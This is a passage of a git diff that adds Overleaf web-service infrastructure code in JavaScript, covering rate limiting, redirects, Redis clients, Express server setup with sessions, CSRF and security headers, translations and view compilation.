'ip' && this._subnetRateLimiter) { + const subnetKey = this.getSubnetKeyFromIp(key) + await this.consumeForRateLimiter( + this._subnetRateLimiter, + subnetKey, + options, + points, + 'ip-subnet' + ) + } + } + + async consumeForRateLimiter(rateLimiter, key, options, points, method) { + try { + const res = await rateLimiter.consume(key, points, options) + return res + } catch (err) { + if (err instanceof Error) { + throw err + } else { + // Only log the first time we exceed the rate limit for a given key and + // duration. This happens when the previous amount of consumed points + // was below the threshold. + if (err.consumedPoints - points <= rateLimiter.points) { + logger.warn({ path: this.name, key }, 'rate limit exceeded') + } + Metrics.inc('rate-limit-hit', 1, { + path: this.name, + method: method || options.method, + }) + throw err + } + } + } + + getSubnetKeyFromIp(ip) { + if (!/^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$/.test(ip)) { + throw new OError( + 'Cannot generate subnet key as the ip address is not of the expected format.', + { ip } + ) + } + + return ip.split('.').slice(0, 3).join('.') + } + + async delete(key) { + return await this._rateLimiter.delete(key) + } +} + +/* + * Shared rate limiters + */ + +const openProjectRateLimiter = new RateLimiter('open-project', { + points: 15, + duration: 60, +}) + +// Keep in sync with the can-skip-captcha options. +const overleafLoginRateLimiter = new RateLimiter( + 'overleaf-login', + Settings.rateLimit?.login?.ip || { + points: 20, + subnetPoints: 200, + duration: 60, + } +) + +module.exports = { + RateLimiter, + openProjectRateLimiter, + overleafLoginRateLimiter, +} diff --git a/services/web/app/src/infrastructure/RedirectManager.js b/services/web/app/src/infrastructure/RedirectManager.js new file mode 100644 index 0000000..2a11af8 --- /dev/null +++ b/services/web/app/src/infrastructure/RedirectManager.js @@ -0,0 +1,83 @@ +/* eslint-disable + max-len, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let RedirectManager +const settings = require('@overleaf/settings') +const { URL } = require('url') + +module.exports = RedirectManager = { + apply(webRouter) { + return (() => { + const result = [] + for (const redirectUrl in settings.redirects) { + const target = settings.redirects[redirectUrl] + result.push( + Array.from(target.methods || ['get']).map(method => + webRouter[method]( + redirectUrl, + RedirectManager.createRedirect(target) + ) + ) + ) + } + return result + })() + }, + + createRedirect(target) { + return function (req, res, next) { + let url + if ( + (req.headers != null ? req.headers['x-skip-redirects'] : undefined) != + null + ) { + return next() + } + let code = 302 + if (typeof target === 'string') { + url = target + } else { + if (req.method !== 'GET') { + code = 307 + } + + if (typeof target.url === 'function') { + url = target.url(req.params) + if (!url) { + return next() + } + } else { + ;({ url } = target) + } + + if (target.baseUrl != null) { + url = `${target.baseUrl}${url}` + } + } + return res.redirect(code, url + getQueryString(req)) + } + }, +} + +// Naively get the query params string. Stringifying the req.query object may +// have differences between Express and Rails, so safer to just pass the raw +// string +function getQueryString(req) { + const { search } = new URL(req.originalUrl, settings.siteUrl) + if (search) { + return search + } else { + return '' + } +} diff --git a/services/web/app/src/infrastructure/RedisWrapper.js b/services/web/app/src/infrastructure/RedisWrapper.js new file mode 100644 index 0000000..fecb00a --- /dev/null +++ b/services/web/app/src/infrastructure/RedisWrapper.js @@ -0,0 +1,29 @@ +const Settings = require('@overleaf/settings') +const redis = require('@overleaf/redis-wrapper') +const { addConnectionDrainer } = require('./GracefulShutdown') + +if ( + typeof global.beforeEach === 'function' && + process.argv.join(' ').match(/unit/) +) { + throw new Error( + 'It looks like unit tests are running, but you are connecting to Redis. Missing a stub?' + ) +} + +// A per-feature interface to Redis, +// looks up the feature in `settings.redis` +// and returns an appropriate client. +// Necessary because we don't want to migrate web over +// to redis-cluster all at once. +module.exports = { + // feature = 'websessions' | 'ratelimiter' | ... + client(feature) { + const redisFeatureSettings = Settings.redis[feature] || Settings.redis.web + const client = redis.createClient(redisFeatureSettings) + addConnectionDrainer(`redis ${feature}`, async () => { + await client.disconnect() + }) + return client + }, +} diff --git a/services/web/app/src/infrastructure/RequestContentTypeDetection.js b/services/web/app/src/infrastructure/RequestContentTypeDetection.js new file mode 100644 index 0000000..6c8c587 --- /dev/null +++ b/services/web/app/src/infrastructure/RequestContentTypeDetection.js @@ -0,0 +1,5 @@ +module.exports = { + acceptsJson(req) { + return req.accepts(['html', 'json']) === 'json' + }, +} diff --git a/services/web/app/src/infrastructure/Response.js b/services/web/app/src/infrastructure/Response.js new file mode 100644 index 0000000..607dbae --- /dev/null +++ b/services/web/app/src/infrastructure/Response.js @@ -0,0 +1,48 @@ +function csvAttachment(res, body, filename) { + if (!filename || !filename.endsWith('.csv')) { + throw new Error('filename must end with .csv') + } + // res.attachment sets both content-type and content-disposition headers. + res.attachment(filename) + res.setHeader('X-Content-Type-Options', 'nosniff') + res.send(body) +} + +function preparePlainTextResponse(res) { + res.setHeader('X-Content-Type-Options', 'nosniff') + res.contentType('text/plain; charset=utf-8') +} + +function plainTextResponse(res, body) { + preparePlainTextResponse(res) + res.send(body) +} + +function xmlResponse(res, body) { + res.setHeader('X-Content-Type-Options', 'nosniff') + res.contentType('application/xml; charset=utf-8') + res.send(body) +} + +function prepareZipAttachment(res, filename) { + if (!filename || !filename.endsWith('.zip')) { + throw new Error('filename must end with .zip') + } + // res.attachment sets both content-type and content-disposition headers. + res.attachment(filename) + res.setHeader('X-Content-Type-Options', 'nosniff') +} + +function zipAttachment(res, body, filename) { + prepareZipAttachment(res, filename) + res.send(body) +} + +module.exports = { + csvAttachment, + plainTextResponse, + preparePlainTextResponse, + prepareZipAttachment, + xmlResponse, + zipAttachment, +} diff --git a/services/web/app/src/infrastructure/ServeStaticWrapper.mjs b/services/web/app/src/infrastructure/ServeStaticWrapper.mjs new file mode 100644 index 0000000..fba667e --- /dev/null +++ b/services/web/app/src/infrastructure/ServeStaticWrapper.mjs @@ -0,0 +1,34 @@ +import express from 'express' +import { plainTextResponse } from './Response.js' + +/* + This wrapper is implemented specifically to handle "Premature Close" errors. + These errors occur when the client cancels a request while static assets are being loaded. + This issue is beyond our control, it can result in unnecessary log noise. + Therefore, this wrapper is added to handle such errors. +*/ +function serveStaticWrapper(root, options) { + const serveStatic = express.static(root, options) + return (req, res, next) => { + serveStatic(req, res, error => { + if (!error) { + return next() + } + + if (error.code !== 'ERR_STREAM_PREMATURE_CLOSE') { + return next(error) + } + + req.logger.addFields({ err: error }) + req.logger.setLevel('debug') + if (res.headersSent) { + res.end() + } else { + res.status(400) + plainTextResponse(res, 'Premature close') + } + }) + } +} + +export default serveStaticWrapper diff --git a/services/web/app/src/infrastructure/Server.mjs b/services/web/app/src/infrastructure/Server.mjs new file mode 100644 index 0000000..3c7fd75 --- /dev/null +++ b/services/web/app/src/infrastructure/Server.mjs @@ -0,0 +1,377 @@ +import express from 'express' +import Settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import Validation from './Validation.js' +import csp from './CSP.js' +import Router from '../router.mjs' +import helmet from 'helmet' +import UserSessionsRedis from '../Features/User/UserSessionsRedis.js' +import Csrf from './Csrf.js' +import HttpPermissionsPolicyMiddleware from './HttpPermissionsPolicy.js' +import SessionAutostartMiddleware from './SessionAutostartMiddleware.js' +import AnalyticsManager from '../Features/Analytics/AnalyticsManager.js' +import session from 'express-session' +import CookieMetrics from './CookieMetrics.js' +import CustomSessionStore from './CustomSessionStore.js' +import bodyParser from './BodyParserWrapper.js' +import methodOverride from 'method-override' +import cookieParser from 'cookie-parser' +import bearerTokenMiddleware from 'express-bearer-token' +import passport from 'passport' +import { Strategy as LocalStrategy } from 'passport-local' +import ReferalConnect from '../Features/Referal/ReferalConnect.mjs' +import RedirectManager from './RedirectManager.js' +import translations from './Translations.js' +import Views from './Views.js' +import Features from './Features.js' +import ErrorController from '../Features/Errors/ErrorController.js' +import HttpErrorHandler from '../Features/Errors/HttpErrorHandler.js' +import UserSessionsManager from '../Features/User/UserSessionsManager.js' +import AuthenticationController from '../Features/Authentication/AuthenticationController.js' +import SessionManager from '../Features/Authentication/SessionManager.js' +import { hasAdminAccess } from '../Features/Helpers/AdminAuthorizationHelper.js' +import Modules from './Modules.js' +import expressLocals from './ExpressLocals.js' +import noCache from 'nocache' +import os from 'node:os' +import http from 'node:http' +import { fileURLToPath } from 'node:url' +import serveStaticWrapper from './ServeStaticWrapper.mjs' + +const sessionsRedisClient = UserSessionsRedis.client() + +const oneDayInMilliseconds = 86400000 + +const STATIC_CACHE_AGE = Settings.cacheStaticAssets + ? oneDayInMilliseconds * 365 + : 0 + +// Init the session store +const sessionStore = new CustomSessionStore({ client: sessionsRedisClient }) + +const app = express() + +const webRouter = express.Router() +const privateApiRouter = express.Router() +const publicApiRouter = express.Router() + +if (Settings.behindProxy) { + app.set('trust proxy', Settings.trustedProxyIps || true) + /** + * Handle the X-Original-Forwarded-For header. + * + * The nginx ingress sends us the contents of X-Forwarded-For it received in + * X-Original-Forwarded-For. Express expects all proxy IPs to be in a comma + * separated list in X-Forwarded-For. + */ + app.use((req, res, next) => { + if ( + req.headers['x-original-forwarded-for'] && + req.headers['x-forwarded-for'] + ) { + req.headers['x-forwarded-for'] = + req.headers['x-original-forwarded-for'] + + ', ' + + req.headers['x-forwarded-for'] + } + next() + }) +} + +// `req.ip` is a getter on the underlying socket. +// The socket details are freed as the connection is dropped -- aka aborted. +// Hence `req.ip` may read `undefined` upon connection drop. +// A couple of places require a valid IP at all times. Cache it! +const ORIGINAL_REQ_IP = Object.getOwnPropertyDescriptor( + Object.getPrototypeOf(app.request), + 'ip' +).get +Object.defineProperty(app.request, 'ip', { + configurable: true, + enumerable: true, + get() { + const ip = ORIGINAL_REQ_IP.call(this) + // Shadow the prototype level getter with a property on the instance. + // Any future access on `req.ip` will get served by the instance property. + Object.defineProperty(this, 'ip', { value: ip }) + return ip + }, +}) + +app.use((req, res, next) => { + if (req.destroyed) { + // Request has been aborted already. + return + } + // Implicitly cache the ip, see above. + if (!req.ip) { + // Critical connection details are missing. + return + } + next() +}) + +if (Settings.exposeHostname) { + const HOSTNAME = os.hostname() + app.use((req, res, next) => { + res.setHeader('X-Served-By', HOSTNAME) + next() + }) +} + +webRouter.use( + serveStaticWrapper( + fileURLToPath(new URL('../../../public', import.meta.url)), + { + maxAge: STATIC_CACHE_AGE, + setHeaders: csp.removeCSPHeaders, + } + ) +) + +app.set('views', fileURLToPath(new URL('../../views', import.meta.url))) +app.set('view engine', 'pug') + +if (Settings.enabledServices.includes('web')) { + if (app.get('env') !== 'development') { + logger.debug('enabling view cache for production or acceptance tests') + app.enable('view cache') + } + if (Settings.precompilePugTemplatesAtBootTime) { + logger.debug('precompiling views for web in production environment') + Views.precompileViews(app) + } + Modules.loadViewIncludes(app) +} + +app.use(metrics.http.monitor(logger)) + +await Modules.applyMiddleware(app, 'appMiddleware') +app.use(bodyParser.urlencoded({ extended: true, limit: '2mb' })) +app.use(bodyParser.json({ limit: Settings.max_json_request_size })) +app.use(methodOverride()) +// add explicit name for telemetry +app.use(bearerTokenMiddleware()) + +if (Settings.blockCrossOriginRequests) { + app.use(Csrf.blockCrossOriginRequests()) +} + +if (Settings.useHttpPermissionsPolicy) { + const httpPermissionsPolicy = new HttpPermissionsPolicyMiddleware( + Settings.httpPermissions + ) + logger.debug('adding permissions policy config', Settings.httpPermissions) + webRouter.use(httpPermissionsPolicy.middleware) +} + +RedirectManager.apply(webRouter) + +if (!Settings.security.sessionSecret) { + throw new Error('No SESSION_SECRET provided.') +} + +const sessionSecrets = [ + Settings.security.sessionSecret, + Settings.security.sessionSecretUpcoming, + Settings.security.sessionSecretFallback, +].filter(Boolean) + +webRouter.use(cookieParser(sessionSecrets)) +webRouter.use(CookieMetrics.middleware) +SessionAutostartMiddleware.applyInitialMiddleware(webRouter) +await Modules.applyMiddleware(webRouter, 'sessionMiddleware', { + store: sessionStore, +}) +webRouter.use( + session({ + resave: false, + saveUninitialized: false, + secret: sessionSecrets, + proxy: Settings.behindProxy, + cookie: { + domain: Settings.cookieDomain, + maxAge: Settings.cookieSessionLength, // in milliseconds, see https://github.com/expressjs/session#cookiemaxage + secure: Settings.secureCookie, + sameSite: Settings.sameSiteCookie, + }, + store: sessionStore, + key: Settings.cookieName, + rolling: Settings.cookieRollingSession === true, + }) +) + +if (Features.hasFeature('saas')) { + webRouter.use(AnalyticsManager.analyticsIdMiddleware) +} + +// passport +webRouter.use(passport.initialize()) +webRouter.use(passport.session()) + +passport.use( + new LocalStrategy( + { + passReqToCallback: true, + usernameField: 'email', + passwordField: 'password', + }, + AuthenticationController.doPassportLogin + ) +) +passport.serializeUser(AuthenticationController.serializeUser) +passport.deserializeUser(AuthenticationController.deserializeUser) + +Modules.hooks.fire('passportSetup', passport, err => { + if (err != null) { + logger.err({ err }, 'error setting up passport in modules') + } +}) + +await Modules.applyNonCsrfRouter(webRouter, privateApiRouter, publicApiRouter) + +webRouter.csrf = new Csrf() +webRouter.use(webRouter.csrf.middleware) +webRouter.use(translations.i18nMiddleware) +webRouter.use(translations.setLangBasedOnDomainMiddleware) + +if (Settings.cookieRollingSession) { + // Measure expiry from last request, not last login + webRouter.use((req, res, next) => { + if (!req.session.noSessionCallback) { + req.session.touch() + if (SessionManager.isUserLoggedIn(req.session)) { + UserSessionsManager.touch( + SessionManager.getSessionUser(req.session), + err => { + if (err) { + logger.err({ err }, 'error extending user session') + } + } + ) + } + } + next() + }) +} + +webRouter.use(ReferalConnect.use) +expressLocals(webRouter, privateApiRouter, publicApiRouter) +webRouter.use(SessionAutostartMiddleware.invokeCallbackMiddleware) + +webRouter.use(function checkIfSiteClosed(req, res, next) { + if (Settings.siteIsOpen) { + next() + } else if (hasAdminAccess(SessionManager.getSessionUser(req.session))) { + next() + } else { + HttpErrorHandler.maintenance(req, res) + } +}) + +webRouter.use(function checkIfEditorClosed(req, res, next) { + if (Settings.editorIsOpen) { + next() + } else if (req.url.indexOf('/admin') === 0) { + next() + } else { + HttpErrorHandler.maintenance(req, res) + } +}) + +webRouter.use(AuthenticationController.validateAdmin) + +// add security headers using Helmet +const noCacheMiddleware = noCache() +webRouter.use((req, res, next) => { + const isProjectPage = /^\/project\/[a-f0-9]{24}$/.test(req.path) + if (isProjectPage) { + // always set no-cache headers on a project page, as it could be an anonymous token viewer + return noCacheMiddleware(req, res, next) + } + + const isProjectFile = /^\/project\/[a-f0-9]{24}\/file\/[a-f0-9]{24}$/.test( + req.path + ) + if (isProjectFile) { + // don't set no-cache headers on a project file, as it's immutable and can be cached (privately) + return next() + } + const isProjectBlob = /^\/project\/[a-f0-9]{24}\/blob\/[a-f0-9]{40}$/.test( + req.path + ) + if (isProjectBlob) { + // don't set no-cache headers on a project blobs, as they are immutable and can be cached (privately) + return next() + } + + const isWikiContent = /^\/learn(-scripts)?(\/|$)/i.test(req.path) + if (isWikiContent) { + // don't set no-cache headers on wiki content, as it's immutable and can be cached (publicly) + return next() + } + + const isLoggedIn = SessionManager.isUserLoggedIn(req.session) + if (isLoggedIn) { + // always set no-cache headers for authenticated users (apart from project files, above) + return noCacheMiddleware(req, res, next) + } + + // allow other responses (anonymous users, except for project pages) to be cached + return next() +}) + +webRouter.use( + helmet({ + // note that more headers are added by default + dnsPrefetchControl: false, + referrerPolicy: { policy: 'origin-when-cross-origin' }, + hsts: false, + // Disabled because it's impractical to include every resource via CORS or + // with the magic CORP header + crossOriginEmbedderPolicy: false, + // We need to be able to share the context of some popups. For example, + // when Recurly opens Paypal in a popup. + crossOriginOpenerPolicy: { policy: 'same-origin-allow-popups' }, + // Disabled because it's not a security header and has possibly-unwanted + // effects + originAgentCluster: false, + // We have custom handling for CSP below, so Helmet's default is disabled + contentSecurityPolicy: false, + }) +) + +// add CSP header to HTML-rendering routes, if enabled +if (Settings.csp && Settings.csp.enabled) { + logger.debug('adding CSP header to rendered routes', Settings.csp) + app.use(csp(Settings.csp)) +} + +logger.debug('creating HTTP server'.yellow) +const server = http.createServer(app) + +// provide settings for separate web and api processes +if (Settings.enabledServices.includes('api')) { + logger.debug({}, 'providing api router') + app.use(privateApiRouter) + app.use(Validation.errorMiddleware) + app.use(ErrorController.handleApiError) +} + +if (Settings.enabledServices.includes('web')) { + logger.debug({}, 'providing web router') + app.use(publicApiRouter) // public API goes with web router for public access + app.use(Validation.errorMiddleware) + app.use(ErrorController.handleApiError) + app.use(webRouter) + app.use(Validation.errorMiddleware) + app.use(ErrorController.handleError) +} + +metrics.injectMetricsRoute(webRouter) +metrics.injectMetricsRoute(privateApiRouter) + +await Router.initialize(webRouter, privateApiRouter, publicApiRouter) + +export default { app, server } diff --git a/services/web/app/src/infrastructure/SessionAutostartMiddleware.js b/services/web/app/src/infrastructure/SessionAutostartMiddleware.js new file mode 100644 index 0000000..eaf6f58 --- /dev/null +++ b/services/web/app/src/infrastructure/SessionAutostartMiddleware.js @@ -0,0 +1,128 @@ +const Settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') + +const botUserAgents = [ + 'kube-probe', + 'GoogleStackdriverMonitoring', + 'GoogleHC', + 'Googlebot', + 'bingbot', + 'facebookexternal', +].map(agent => { + return agent.toLowerCase() +}) +// SessionAutostartMiddleware provides a mechanism to force certain routes not +// to get an automatic session where they don't have one already. This allows us +// to work around issues where we might overwrite a user's login cookie with one +// that is hidden by a `SameSite` setting. +// +// When registering a route with disableSessionAutostartForRoute, a callback +// should be provided that handles the case that a session is not available. +// This will be called as a standard middleware with (req, res, next) - calling +// next will continue and sett up a session as normal, otherwise the app can +// perform a different operation as usual + +class SessionAutostartMiddleware { + constructor() { + this.middleware = this.middleware.bind(this) + this._cookieName = Settings.cookieName + this._noAutostartCallbacks = new Map() + } + + static applyInitialMiddleware(router) { + const middleware = new SessionAutostartMiddleware() + router.sessionAutostartMiddleware = middleware + router.use(middleware.middleware) + } + + disableSessionAutostartForRoute(route, method, callback) { + if (typeof callback !== 'function') { + throw new Error('callback not provided when disabling session autostart') + } + + if (!this._noAutostartCallbacks[route]) { + this._noAutostartCallbacks[route] = new Map() + } + + this._noAutostartCallbacks[route][method] = callback + } + + applyDefaultPostGatewayForRoute(route) { + this.disableSessionAutostartForRoute( + route, + 'POST', + SessionAutostartMiddleware.genericPostGatewayMiddleware + ) + } + + autostartCallbackForRequest(req) { + return ( + this._noAutostartCallbacks[req.path] && + this._noAutostartCallbacks[req.path][req.method] + ) + } + + reqIsBot(req) { + const agent = (req.headers['user-agent'] || '').toLowerCase() + + const foundMatch = botUserAgents.find(botAgent => { + return agent.includes(botAgent) + }) + + if (foundMatch) { + return true + } else { + return false + } + } + + middleware(req, _res, next) { + if ( + !req.signedCookies[this._cookieName] && + req.query?.autostartSession !== 'true' + ) { + const callback = this.autostartCallbackForRequest(req) + if (callback) { + req.session = { + noSessionCallback: callback, + } + } else if (this.reqIsBot(req)) { + req.session = { + noSessionCallback: (_req, _res, next) => { + next() + }, + // prevent exception for bot accesses to /project (which requires + // login and regenerates session) + regenerate: cb => cb(), + } + } + } + next() + } + + static invokeCallbackMiddleware(req, res, next) { + if (req.session.noSessionCallback) { + return req.session.noSessionCallback(req, res, next) + } + next() + } + + static genericPostGatewayMiddleware(req, res, next) { + if (req.method !== 'POST') { + return next( + new OError('post gateway invoked for non-POST request', { + path: req.path, + method: req.method, + }) + ) + } + + if (req.body.viaGateway) { + return next() + } + + res.render('general/post-gateway', { form_data: req.body }) + } +} + +module.exports = SessionAutostartMiddleware diff --git a/services/web/app/src/infrastructure/SiteAdminHandler.js b/services/web/app/src/infrastructure/SiteAdminHandler.js new file mode 100644 index 0000000..cd6df2a --- /dev/null +++ b/services/web/app/src/infrastructure/SiteAdminHandler.js @@ -0,0 +1,92 @@ +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const fs = require('fs') +const { + addOptionalCleanupHandlerAfterDrainingConnections, + addRequiredCleanupHandlerBeforeDrainingConnections, +} = require('./GracefulShutdown') +const Features = require('./Features') +const UserHandler = require('../Features/User/UserHandler') +const metrics = require('@overleaf/metrics') + +// Monitor a site maintenance file (e.g. /etc/site_status) periodically and +// close the site if the file contents contain the string "closed". + +const STATUS_FILE_CHECK_INTERVAL = 5000 +const statusFile = settings.siteMaintenanceFile + +function updateSiteMaintenanceStatus(fileContent) { + const isClosed = !settings.siteIsOpen + const shouldBeClosed = fileContent && fileContent.indexOf('closed') >= 0 + if (!isClosed && shouldBeClosed) { + settings.siteIsOpen = false + logger.warn({ fileContent }, 'putting site into maintenance mode') + } else if (isClosed && !shouldBeClosed) { + settings.siteIsOpen = true + logger.warn({ fileContent }, 'taking site out of maintenance mode') + } +} + +function pollSiteMaintenanceFile() { + fs.readFile(statusFile, { encoding: 'utf8' }, (err, fileContent) => { + if (err) { + logger.error( + { file: statusFile, fsErr: err }, + 'error reading site maintenance file' + ) + return + } + updateSiteMaintenanceStatus(fileContent) + }) +} + +function checkSiteMaintenanceFileSync() { + // crash on start up if file does not exist + const content = fs.readFileSync(statusFile, { encoding: 'utf8' }) + updateSiteMaintenanceStatus(content) +} + +const SERVER_PRO_ACTIVE_USERS_METRIC_INTERVAL = + settings.activeUserMetricInterval || 1000 * 60 * 60 + +function publishActiveUsersMetric() { + UserHandler.promises + .countActiveUsers() + .then(activeUserCount => metrics.gauge('num_active_users', activeUserCount)) + .catch(error => logger.error({ error }, 'error counting active users')) +} + +module.exports = { + initialise() { + if (settings.enabledServices.includes('web') && statusFile) { + logger.debug( + { statusFile, interval: STATUS_FILE_CHECK_INTERVAL }, + 'monitoring site maintenance file' + ) + checkSiteMaintenanceFileSync() // perform an initial synchronous check at start up + const intervalHandle = setInterval( + pollSiteMaintenanceFile, + STATUS_FILE_CHECK_INTERVAL + ) // continue checking periodically + addOptionalCleanupHandlerAfterDrainingConnections( + 'poll site maintenance file', + () => { + clearInterval(intervalHandle) + } + ) + } + if (!Features.hasFeature('saas')) { + publishActiveUsersMetric() + const intervalHandle = setInterval( + publishActiveUsersMetric, + SERVER_PRO_ACTIVE_USERS_METRIC_INTERVAL + ) + addRequiredCleanupHandlerBeforeDrainingConnections( + 'publish server pro usage metrics', + () => { + clearInterval(intervalHandle) + } + ) + } + }, +} diff --git a/services/web/app/src/infrastructure/Translations.js b/services/web/app/src/infrastructure/Translations.js new file mode 100644 index 0000000..9c2cc79 --- /dev/null +++ b/services/web/app/src/infrastructure/Translations.js @@ -0,0 +1,147 @@ +const i18n = require('i18next') +const fsBackend = require('i18next-fs-backend') +const middleware = require('i18next-http-middleware') +const path = require('path') +const Settings = require('@overleaf/settings') +const { URL } = require('url') +const pug = require('pug-runtime') +const logger = require('@overleaf/logger') +const SafeHTMLSubstitution = require('../Features/Helpers/SafeHTMLSubstitution') + +const fallbackLanguageCode = Settings.i18n.defaultLng || 'en' +const availableLanguageCodes = [] +const availableHosts = new Map() +const subdomainConfigs = new Map() +const I18N_HTML_INJECTIONS = new Set() + +Object.values(Settings.i18n.subdomainLang || {}).forEach(function (spec) { + availableLanguageCodes.push(spec.lngCode) + // prebuild a host->lngCode mapping for the usage at runtime in the + // middleware + availableHosts.set(new URL(spec.url).host, spec.lngCode) + + // prebuild a lngCode -> language config mapping; some subdomains should + // not appear in the language picker + if (!spec.hide) { + subdomainConfigs.set(spec.lngCode, spec) + } +}) +if (!availableLanguageCodes.includes(fallbackLanguageCode)) { + // always load the fallback locale + availableLanguageCodes.push(fallbackLanguageCode) +} + +// The "node --watch" flag is not easy to detect. +if (process.argv.includes('--watch-locales')) { + // Dummy imports for setting up watching of locales files. + for (const lngCode of availableLanguageCodes) { + require(`../../../locales/${lngCode}.json`) + } +} + +i18n + .use(fsBackend) + .use(middleware.LanguageDetector) + .init({ + backend: { + loadPath: path.join(__dirname, '../../../locales/__lng__.json'), + }, + + // still using the v3 plural suffixes + compatibilityJSON: 'v3', + + // Load translation files synchronously: https://www.i18next.com/overview/configuration-options#initimmediate + initImmediate: false, + + // We use the legacy v1 JSON format, so configure interpolator to use + // underscores instead of curly braces + interpolation: { + prefix: '__', + suffix: '__', + unescapeSuffix: 'HTML', + // Disable escaping of interpolated values for backwards compatibility. + // We escape the value after it's translated in web, so there's no + // security risk + escapeValue: Settings.i18n.escapeHTMLInVars, + // Disable nesting in interpolated values, preventing user input + // injection via another nested value + skipOnVariables: true, + + defaultVariables: { + appName: Settings.appName, + }, + }, + + preload: availableLanguageCodes, + supportedLngs: availableLanguageCodes, + fallbackLng: fallbackLanguageCode, + }) + .catch(err => { + logger.error({ err }, 'failed to initialize i18next library') + }) + +// Make custom language detector for Accept-Language header +const headerLangDetector = new middleware.LanguageDetector(i18n.services, { + order: ['header'], +}) + +function setLangBasedOnDomainMiddleware(req, res, next) { + // Determine language from subdomain + const lang = availableHosts.get(req.headers.host) + if (lang) { + req.i18n.changeLanguage(lang) + } + + // expose the language code to pug + res.locals.currentLngCode = req.language + + // If the set language is different from the language detection (based on + // the Accept-Language header), then set flag which will show a banner + // offering to switch to the appropriate library + const detectedLanguageCode = headerLangDetector.detect(req, res) + if (req.language !== detectedLanguageCode) { + res.locals.suggestedLanguageSubdomainConfig = + subdomainConfigs.get(detectedLanguageCode) + } + + // Decorate req.i18n with translate function alias for backwards + // compatibility usage in requests + req.i18n.translate = (key, vars, components) => { + vars = vars || {} + + if (Settings.i18n.checkForHTMLInVars) { + Object.entries(vars).forEach(([field, value]) => { + if (pug.escape(value) !== value) { + const violationsKey = key + field + // do not flood the logs, log one sample per pod + key + field + if (!I18N_HTML_INJECTIONS.has(violationsKey)) { + logger.warn( + { key, field, value }, + 'html content in translations context vars' + ) + I18N_HTML_INJECTIONS.add(violationsKey) + } + } + }) + } + + const locale = req.i18n.t(key, vars) + if (components) { + return SafeHTMLSubstitution.render(locale, components) + } else { + return locale + } + } + + next() +} + +// Decorate i18n with translate function alias for backwards compatibility +// in direct usage +i18n.translate = i18n.t + +module.exports = { + i18nMiddleware: middleware.handle(i18n), + setLangBasedOnDomainMiddleware, + i18n, +} diff --git a/services/web/app/src/infrastructure/UnsupportedBrowserMiddleware.js b/services/web/app/src/infrastructure/UnsupportedBrowserMiddleware.js new file mode 100644 index 0000000..c145c9f --- /dev/null +++ b/services/web/app/src/infrastructure/UnsupportedBrowserMiddleware.js @@ -0,0 +1,50 @@ +const Bowser = require('bowser') +const Settings = require('@overleaf/settings') +const Url = require('url') +const { getSafeRedirectPath } = require('../Features/Helpers/UrlHelper') + +function unsupportedBrowserMiddleware(req, res, next) { + if (!Settings.unsupportedBrowsers) return next() + + // Prevent redirect loop + const path = req.path + if (path === '/unsupported-browser') return next() + + const userAgent = req.headers['user-agent'] + + if (!userAgent) return next() + + const parser = Bowser.getParser(userAgent) + + // Allow bots through by only ignoring bots or unrecognised UA strings + const isBot = parser.isPlatform('bot') || !parser.getBrowserName() + if (isBot) return next() + + const isUnsupported = parser.satisfies(Settings.unsupportedBrowsers) + if (isUnsupported) { + return res.redirect( + Url.format({ + pathname: '/unsupported-browser', + query: { fromURL: req.originalUrl }, + }) + ) + } + + next() +} + +function renderUnsupportedBrowserPage(req, res) { + let fromURL + if (typeof req.query.fromURL === 'string') { + try { + fromURL = + Settings.siteUrl + (getSafeRedirectPath(req.query.fromURL) || '/') + } catch (e) {} + } + res.render('general/unsupported-browser', { fromURL }) +} + +module.exports = { + renderUnsupportedBrowserPage, + unsupportedBrowserMiddleware, +} diff --git a/services/web/app/src/infrastructure/Validation.js b/services/web/app/src/infrastructure/Validation.js new file mode 100644 index 0000000..eafb82c --- /dev/null +++ b/services/web/app/src/infrastructure/Validation.js @@ -0,0 +1,34 @@ +const { Joi: CelebrateJoi, celebrate, errors } = require('celebrate') +const { ObjectId } = require('mongodb-legacy') + +const objectIdValidator = { + type: 'objectId', + base: CelebrateJoi.any(), + messages: { + 'objectId.invalid': 'needs to be a valid ObjectId', + }, + coerce(value) { + return { + value: typeof value === typeof ObjectId ? value : new ObjectId(value), + } + }, + prepare(value, helpers) { + if (!ObjectId.isValid(value)) { + return { + errors: helpers.error('objectId.invalid'), + } + } + }, +} + +const Joi = CelebrateJoi.extend(objectIdValidator) +const errorMiddleware = errors() + +module.exports = { Joi, validate, errorMiddleware } + +/** + * Validation middleware + */ +function validate(schema) { + return celebrate(schema, { allowUnknown: true }) +} diff --git a/services/web/app/src/infrastructure/Views.js b/services/web/app/src/infrastructure/Views.js new file mode 100644 index 0000000..fc60eb8 --- /dev/null +++ b/services/web/app/src/infrastructure/Views.js @@ -0,0 +1,212 @@ +const logger = require('@overleaf/logger') +const pug = require('pug') +const globby = require('globby') +const Settings = require('@overleaf/settings') +const fs = require('fs') +const Path = require('path') + +// Generate list of view names from app/views +function buildViewList() { + return globby + .sync('app/views/**/*.pug', { + onlyFiles: true, + concurrency: 1, + ignore: [ + // Ignore includes + '**/_*.pug', + '**/_*/**', + // Ignore shared layout files + 'app/views/layout*', + 'app/views/layout/*', + ], + }) + .concat( + globby.sync('modules/*/app/views/**/*.pug', { + onlyFiles: true, + concurrency: 1, + // Ignore includes + ignore: ['**/_*.pug', '**/_*/**'], + }) + ) + .concat(Object.values(Settings.viewIncludes).flat()) + .map(x => Path.resolve(x)) +} + +const PUG_COMPILE_ARGUMENTS = { + doctype: 'html', + cache: true, + compileDebug: Settings.debugPugTemplates, + inlineRuntimeFunctions: false, + module: true, +} + +/** + * @param {string} compiled + * @return {{duplicates: Array<string>, found: Array<string>}} + * @private + */ +function _findAllMetaTags(compiled) { + const inString = /name=(\\?["'`])(ol-.+?)\1/g + const asExpression = /pug\.attr\("name",\s*(["'`])(ol-.+?)\1/g + + const found = new Set() + const duplicates = new Set() + for (const regex of [inString, asExpression]) { + for (const [, , name] of compiled.matchAll(regex)) { + if (found.has(name)) 